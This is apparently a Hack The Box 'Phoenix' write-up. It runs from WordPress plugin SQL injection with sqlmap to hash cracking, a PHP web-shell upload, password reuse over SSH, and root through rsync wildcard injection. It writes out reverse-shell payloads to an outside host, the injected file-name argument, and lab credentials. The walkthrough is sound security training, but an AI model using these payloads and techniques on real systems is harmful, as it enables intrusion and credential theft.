# Robots file
`https://phoenix.htb/robots.txt`

```
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php

Sitemap: https://phoenix.htb/wp-sitemap.xml
```

# Posible usuarios
`https://phoenix.htb/wp-sitemap-users-1.xml`
```
jsmith
phoenix
```

# Asgaros plugin

```html
<link rel='stylesheet' id='af-fontawesome-css'  href='https://phoenix.htb/wp-content/plugins/asgaros-forum/libs/fontawesome/css/all.min.css?ver=1.15.12' media='all' />
```

# SQL Injection Asgaros 1.15.12

`https://phoenix.htb/forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(10)`

`sqlmap -r req.txt -p subscribe_topic --dbms=mysql --dbs`

```
available databases [2]:
[*] information_schema
[*] wordpress
```

`sqlmap -r req.txt -p subscribe_topic --dbms=mysql -D wordpress -T wp_users -C id,user_login,user_pass --dump`

```
Database: wordpress
Table: wp_users
[6 entries]
+----+------------+------------------------------------+
| id | user_login | user_pass                          |
+----+------------+------------------------------------+
| 1  | Phoenix    | $P$BA5zlC0IhOiJKMTK.nWBgUB4Lxh/gc. |
| 3  | john       | $P$B8eBH6QfVODeb/gYCSJRvm9MyRv7xz. |
| 5  | Jsmith     | $P$BV5kUPHrZfVDDWSkvbt/Fw3Oeozb.G. |
| 6  | Jane       | $P$BJCq26vxPmaQtAthFcnyNv1322qxD91 |
| 7  | Jack       | $P$BzalVhBkVN.6ii8y/nbv3CTLbC0E9e. |
| 8  | test       | $P$BjEB7ZbDnzvOFfjgK9bzK4m.E0SqK01 |
+----+------------+------------------------------------+
```

`john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt`

```
┌──(root㉿kali)-[~/htb/Box/Linux/Phoenix]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
phoenixthefirebird14 phoenix     
superphoenix     jsmith     
password@1234    john     
3g 0:00:20:40 DONE (2022-03-19 22:23) 0.002418g/s 11560p/s 30898c/s 30898C/s !!!@@@!!!..*7¡Vamos!
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.
```

# Dump active plugins, we can see download-from-files

`sqlmap -r req.txt -p subscribe_topic --dbms=mysql -D wordpress -T wp_options -C option_name,option_value --where="option_name='active_plugins'" --dump`

```
active_plugins | a:9:{i:0;s:45:"accordion-slider-gallery/accordion-slider.php";i:1;s:25:"adminimize/adminimize.php";i:2;s:31:"asgaros-forum/asgaros-forum.php";i:3;s:43:"download-from-files/download-from-files.php";i:4;s:67:"miniorange-2-factor-authentication/miniorange_2_factor_settings.php";i:5;s:47:"photo-gallery-builder/photo-gallery-builder.php";i:6;s:29:"pie-register/pie-register.php";i:7;s:45:"simple-local-avatars/simple-local-avatars.php";i:8;s:38:"timeline-event-history/timeline-wp.php";}
```

# Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload

`Modify exploit`

```
24 response = requests.get(uri, verify=False)
....
....
....
64 response = requests.post(uri, files=files, data=data, verify=False)
```

`Make shell file`

```
┌──(root㉿kali)-[~/htb/Box/Linux/Phoenix]
└─# nano doom.phtml 
                                                                                                                                                 
┌──(root㉿kali)-[~/htb/Box/Linux/Phoenix]
└─# cat doom.phtml 
<?php system('bash -c "bash -i >& /dev/tcp/10.10.14.92/1234 0>&1"');?>
```

`python3 50287.py https://phoenix.htb doom.phtml`

```
┌──(root㉿kali)-[~/htb/Box/Linux/Phoenix]
└─# python3 50287.py https://phoenix.htb doom.phtml 
Download From Files <= 1.48 - Arbitrary File Upload
Author -> spacehen (www.github.com/spacehen)
/usr/lib/python3/dist-packages/urllib3/connectionpool.py:1046: InsecureRequestWarning: Unverified HTTPS request is being made to host 'phoenix.htb'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warnings.warn(
Uploading Shell...
/usr/lib/python3/dist-packages/urllib3/connectionpool.py:1046: InsecureRequestWarning: Unverified HTTPS request is being made to host 'phoenix.htb'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warnings.warn(
Shell Uploaded!
https://phoenix.htb/wp-admin/doom.phtml
```

`https://phoenix.htb/wp-admin/doom.phtml`

# Enum Priv Esc

`cat /srv/www/wordpress/wp-config.php`

```
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'wordpress' );

/** MySQL database password */
define( 'DB_PASSWORD', '<++32%himself%FIRM%section%32++>' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost:/var/run/mysqld/mysqld.sock' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
```

# Netstat Strange IP

`netstat`

```
wp_user@phoenix:~/wordpress/wp-admin$ netstat 
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      2 10.129.140.55:54014     10.10.14.92:1234        ESTABLISHED
tcp        0      1 10.11.12.13:46540       10.11.12.14:ssh         SYN_SENT   
tcp        0      1 10.11.12.13:46540       10.11.12.14:ssh         SYN_SENT   
Active UNIX domain sockets (w/o servers)
```

# Connect with SSH editor user

`ssh editor@10.11.12.13`
```
editor : superphoenix
```

```
wp_user@phoenix:~/wordpress/wp-admin$ ssh editor@10.11.12.13 
$$$$$$$\  $$\                                     $$\           
$$  __$$\ $$ |                                    \__|          
$$ |  $$ |$$$$$$$\   $$$$$$\   $$$$$$\  $$$$$$$\  $$\ $$\   $$\ 
$$$$$$$  |$$  __$$\ $$  __$$\ $$  __$$\ $$  __$$\ $$ |\$$\ $$  |
$$  ____/ $$ |  $$ |$$ /  $$ |$$$$$$$$ |$$ |  $$ |$$ | \$$$$  / 
$$ |      $$ |  $$ |$$ |  $$ |$$   ____|$$ |  $$ |$$ | $$  $$<  
$$ |      $$ |  $$ |\$$$$$$  |\$$$$$$$\ $$ |  $$ |$$ |$$  /\$$\ 
\__|      \__|  \__| \______/  \_______|\__|  \__|\__|\__/  \__|
Password: 
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-96-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 20 Mar 2022 03:36:57 PM UTC

  System load:             0.07
  Usage of /:              70.5% of 4.36GB
  Memory usage:            26%
  Swap usage:              0%
  Processes:               238
  Users logged in:         0
  IPv4 address for ens160: 10.129.140.55
  IPv6 address for ens160: dead:beef::250:56ff:feb9:2e54
  IPv4 address for eth0:   10.11.12.13


8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


editor@phoenix:~$ id
uid=1002(editor) gid=1002(editor) groups=1002(editor)
editor@phoenix:~$ cat user.txt 
d89ac79ef4ba128c0f177eaa9bd2549a
```

# Strange directory

```
╔══════════╣ Unexpected in root
/backups 
```

# See process with pspy

`/tmp/pspy64 -f`

```
2022/03/20 16:48:10 FS:                 OPEN | /usr/local/bin/cron.sh.x
```

# Dont close pspy and execute binary we can see next

`/usr/local/bin/cron.sh.x`

```sh
#!/bin/sh
NOW=$(date +"%Y-%m-%d-%H-%M")                                                                                                                    
FILE="phoenix.htb.$NOW.tar"                                                                                                                      
                                                                                                                                                 
cd /backups                                                                                                                                      
mysqldump -u root wordpress > dbbackup.sql                                                                                                       
tar -cf $FILE dbbackup.sql && rm dbbackup.sql                                                                                                    
gzip -9 $FILE                                                                                                                                    
find . -type f -mmin +30 -delete                                                                                                                 
rsync --ignore-existing -t *.* jit@10.11.12.14:/backups/                                                                                         
/usr/local/bin/cron.sh.x
```

# Rsync has wildcard

`rsync --ignore-existing -t *.* jit@10.11.12.14:/backups/`

# Make files in backups directory

```
editor@phoenix:/backups$ touch -- "-e sh .shell"                                            
editor@phoenix:/backups$ echo 'bash -c "bash -i >& /dev/tcp/10.10.14.92/5555 0>&1"' > .shell
```

# Wait until cronjob execute and get shell

```
┌──(root㉿kali)-[~/htb/Box/Linux/Phoenix]
└─# nc -lvnp 5555
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.129.140.55.
Ncat: Connection from 10.129.140.55:35320.
bash: cannot set terminal process group (92870): Inappropriate ioctl for device
bash: no job control in this shell
root@phoenix:/backups# id
id
uid=0(root) gid=0(root) groups=0(root)
```

# References
https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1 \
https://faq.miniorange.com/knowledgebase/i-am-locked-cant-access-my-account-what-do-i-do/ \
https://www.exploit-db.com/exploits/50287 \
https://betterprogramming.pub/becoming-root-with-wildcard-injections-on-linux-2dc94032abeb